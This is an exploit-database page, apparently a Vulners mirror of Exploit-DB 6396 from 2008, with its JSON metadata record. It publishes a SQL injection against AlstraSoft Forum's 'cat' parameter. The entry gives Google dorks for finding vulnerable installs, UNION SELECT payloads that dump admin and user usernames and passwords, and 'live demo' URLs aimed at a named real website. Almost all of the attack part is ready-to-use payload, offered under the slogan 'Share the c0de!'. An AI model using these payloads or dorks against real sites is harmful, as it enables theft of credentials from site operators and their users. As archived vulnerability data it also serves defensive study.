Search...

Alstrasoft Forum - 'cat' SQL Injection

2008-09-07T00:00:00

ID EDB-ID:6396
Type exploitdb
Reporter r45c4l
Modified 2008-09-07T00:00:00

Description

                                        
                                            ################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    &lt;\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____&gt;\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  &gt;__|    \___  &gt;\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# 
#  ---  QKrun1x  - skillfaker - FeDeReR - Optyx - Nuclear  
#                   and all darkc0de members                ---# 
################################################################ 
# 
# Author: r45c4l and P47r1ck 
# 
# Home  : www.darkc0de.com 
# 
# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com
# 
# Share the c0de! 
# 
################################################################ 
# 
# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability
#
#
# App Name:  AlstraSoft Forum 
# 
# App Home: http://www.alstrasoft.com/
# 
# Dork: inurl:index.php?menu=showcat=
# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange
# 
# 
# 
# 
# 
# POC: For Admin id and pass
#      index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- 
# 
# P0C-2: For Users id and pass
#       index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--
# 
# Live Demo: (For admin)
# 
# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--
#  
# Live Demo: (For Users)
#  http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1--
#
#
# Admin panel is at http://site.com/admin 
################################################################ 
# Vuln Discovered 7th Sep 2008 

# milw0rm.com [2008-09-07]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:6396", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Alstrasoft Forum - 'cat' SQL Injection", "description": "", "published": "2008-09-07T00:00:00", "modified": "2008-09-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/6396", "reporter": "r45c4l", "references": [], "cvelist": ["2008-3954"], "immutableFields": [], "lastseen": "2022-01-13T07:05:22", "viewCount": 11, "enchantments": {"dependencies": {}, "score": {"value": 6.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2008-3954"]}]}, "exploitation": null, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/6396", "sourceData": "################################################################ \r\n# .___ __ _______ .___ # \r\n# __| _/____ _______| | __ ____ \\ _ \\ __| _/____ # \r\n# / __ |\\__ \\\\_ __ \\ |/ // ___\\/ /_\\ \\ / __ |/ __ \\ # \r\n# / /_/ | / __ \\| | \\/ <\\ \\___\\ \\_/ \\/ /_/ \\ ___/ # \r\n# \\____ |(______/__| |__|_ \\\\_____>\\_____ /\\_____|\\____\\ # \r\n# \\/ \\/ \\/ # \r\n# ___________ ______ _ __ # \r\n# _/ ___\\_ __ \\_/ __ \\ \\/ \\/ / # \r\n# \\ \\___| | \\/\\ ___/\\ / # \r\n# \\___ >__| \\___ >\\/\\_/ # \r\n# est.2007 \\/ \\/ forum.darkc0de.com # \r\n################################################################ \r\n# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu# \r\n# --- QKrun1x - skillfaker - FeDeReR - Optyx - Nuclear \r\n# and all darkc0de members ---# \r\n################################################################ \r\n# \r\n# Author: r45c4l and P47r1ck \r\n# \r\n# Home : www.darkc0de.com \r\n# \r\n# Email : r45c4l@hotmail.com, p47r1ckro[at]gmail[dot]com\r\n# \r\n# Share the c0de! \r\n# \r\n################################################################ \r\n# \r\n# Exploit: Altrasoft Forum (cat) Remote SQL Injection Vulnerability\r\n#\r\n#\r\n# App Name: AlstraSoft Forum \r\n# \r\n# App Home: http://www.alstrasoft.com/\r\n# \r\n# Dork: inurl:index.php?menu=showcat=\r\n# Dork2: Powered By AlstraSoft Forum Pay Per Post Exchange\r\n# \r\n# \r\n# \r\n# \r\n# \r\n# POC: For Admin id and pass\r\n# index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin-- \r\n# \r\n# P0C-2: For Users id and pass\r\n# index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+2,1--\r\n# \r\n# Live Demo: (For admin)\r\n# \r\n# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(auser,0x3a,apass),3+from+admin--\r\n# \r\n# Live Demo: (For Users)\r\n# http://payperpostpro.com/index.php?menu=showcat&cat=-1+union+all+select+1,concat(username,0x3a,upass),3+from+users+limit+1,1--\r\n#\r\n#\r\n# Admin panel is at http://site.com/admin \r\n################################################################ \r\n# Vuln Discovered 7th Sep 2008 \r\n\r\n# milw0rm.com [2008-09-07]", "osvdbidlist": ["48002"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1645378699}}

Alstrasoft Forum - &#039;cat&#039; SQL Injection

Description

Alstrasoft Forum - 'cat' SQL Injection